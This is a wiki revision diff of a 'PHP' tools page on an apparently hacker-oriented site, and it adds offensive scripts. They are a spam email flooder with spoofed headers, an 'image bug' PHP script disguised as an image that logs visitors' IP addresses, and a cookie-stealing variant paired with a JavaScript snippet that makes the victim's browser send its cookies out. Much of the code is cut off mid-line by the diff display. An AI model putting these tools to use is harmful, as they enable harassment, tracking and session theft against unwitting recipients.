tools:php
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
tools:php [2024/06/03 03:40] – [Simple Backdoor in PHP] Humphrey Boa-Gart | tools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | {{wst> | + | {{wst> |
====== PHP ====== | ====== PHP ====== | ||
Line 324: | Line 324: | ||
==== Email flooder in PHP ==== | ==== Email flooder in PHP ==== | ||
- | ===== Image bugs ===== | + | If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now. |
- | {{tag> | + | You need to have: |
+ | |||
+ | 1. a server 2. basic knowledge of PHP 3. knowledge on how to install/ | ||
+ | |||
+ | <?php | ||
+ | | ||
+ | // define number of spam cycles | ||
+ | |||
+ | | ||
+ | // this is the message | ||
+ | |||
+ | | ||
+ | // define recipient | ||
+ | |||
+ | $rofl = $_POST[" | ||
+ | // your message | ||
+ | |||
+ | | ||
+ | $sender = $_POST[" | ||
+ | $header = ' | ||
+ | | ||
+ | From: <' . $sender . '>'; | ||
+ | |||
+ | return($header); | ||
+ | } | ||
+ | // spoofed header. i found it easier to write it this way. | ||
+ | |||
+ | | ||
+ | for($i = 1; $i <= $spam; $i++){ | ||
+ | |||
+ | | ||
+ | |||
+ | mail($_POST[" | ||
+ | |||
+ | } // (the second for loop) defines one cycle | ||
+ | |||
+ | echo "Done $i loops of $spam | ||
+ | "; // | ||
+ | |||
+ | } | ||
+ | echo " | ||
+ | } | ||
+ | else { | ||
+ | /* if the form isn't filled out show it. also, mess around with this part any way you like. */ | ||
+ | ?> | ||
+ | <form method=" | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | < | ||
+ | |||
+ | </ | ||
+ | <?php | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | ===== Image Bugs ===== | ||
+ | |||
+ | Pretty fucking simple, really. You insert the following into an e-mail or something: | ||
+ | |||
+ | c | ||
+ | |||
+ | Then in iplulz.php on your server (or whatever you call it), put this code: | ||
+ | |||
+ | //PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.// | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister = fopen(" | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime = " | ||
+ | else $image_mime = substr($the_image, | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | User gets the image, you get their IP added to a list. EVERYONE WINS | ||
+ | |||
+ | Also, can steel cookies in dat way: | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister = fopen(" | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime = " | ||
+ | else $image_mime = substr($the_image, | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | And in email or whatevastuff put | ||
+ | |||
+ | < | ||
+ | document.write("< | ||
+ | ') | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{tag> |
tools/php.1717386058.txt.gz · Last modified: 2024/08/06 05:52 (external edit)
Find this page online at: https://bestpoint.institute/tools/php
Find this page online at: https://bestpoint.institute/tools/php